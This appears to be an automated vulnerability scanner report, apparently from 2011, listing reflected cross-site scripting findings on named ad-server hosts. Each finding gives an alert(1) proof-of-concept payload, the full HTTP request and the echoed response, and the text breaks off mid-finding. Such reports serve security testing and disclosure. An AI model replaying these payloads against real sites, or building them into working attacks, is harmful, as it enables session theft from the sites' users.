Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5693a'-alert(1)-'88333851b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Sun, 02 Oct 2011 23:51:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:12 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;net=cm;ord=$random$;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddccb'-alert(1)-'fb58dd8594f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 02 Oct 2011 23:51:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:10 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 660ee'-alert(1)-'ae4a32c4786 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?660ee'-alert(1)-'ae4a32c4786 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sun, 02 Oct 2011 23:51:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E3184c20852dc099873bc3845; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?660ee'-alert(1)-'ae4a32c4786;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a54d'-alert(1)-'bfe528f9315 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian4a54d'-alert(1)-'bfe528f9315/;sz=300x250;net=cm;ord=$random$;env=ifr;ord1=63589;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:21 GMT
Content-Length: 8208
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30314387801_1317599481","http://ib.adnxs.com/ptj?member=311&inv_code=cm.guardian4a54d'-alert(1)-'bfe528f9315&size=300x250&imp_id=cm-30314387801_1317599481,122eace26f8db51&referrer=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.guardian4a54d%27-
...[SNIP]...

4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 264f9(a)bbc3f94df69 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian/;sz=264f9(a)bbc3f94df69 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:16 GMT
Content-Length: 8074
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:264f9(a)bbc3f94df69,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c0a1"-alert(1)-"c16fe58ffb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250&9c0a1"-alert(1)-"c16fe58ffb9=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:01 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?9c0a1"-alert(1)-"c16fe58ffb9=1&Z=300x250&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=339107265";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i
...[SNIP]...

4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec07e"><script>alert(1)</script>3f7f80201f0 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ec07e"><script>alert(1)</script>3f7f80201f0&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=3497789830921369198&fpid=ec07e"><script>alert(1)</script>3f7f80201f0&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.8. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f88"><script>alert(1)</script>8138f9b958e was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=99f88"><script>alert(1)</script>8138f9b958e HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=9036514181597041788&fpid=1&nu=n&t=&sp=99f88"><script>alert(1)</script>8138f9b958e&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e961"-alert(1)-"cb5fec4d025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=468x60&section=2398370&8e961"-alert(1)-"cb5fec4d025=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:49:07 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?8e961"-alert(1)-"cb5fec4d025=1&Z=468x60&s=2398370&_salt=2593956440";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd43b"><script>alert(1)</script>36334559423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2126909&dd43b"><script>alert(1)</script>36334559423=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:42 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:42 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&dd43b"><script>alert(1)</script>36334559423=1&s=2126909&_salt=328484640&t=2" target="_parent">
...[SNIP]...

4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd3c"-alert(1)-"451a8231aa5 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=3bd3c"-alert(1)-"451a8231aa5 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599365384;key=key1+key2+key3+key4;nodecode=yes;link=3bd3c"-alert(1)-"451a8231aa5") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...

4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116c3'-alert(1)-'ce519b8c547 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=116c3'-alert(1)-'ce519b8c547 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599367009;key=key1+key2+key3+key4;nodecode=yes;link=116c3'-alert(1)-'ce519b8c547')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...

4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d5b"-alert(1)-"4f51d7bed73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

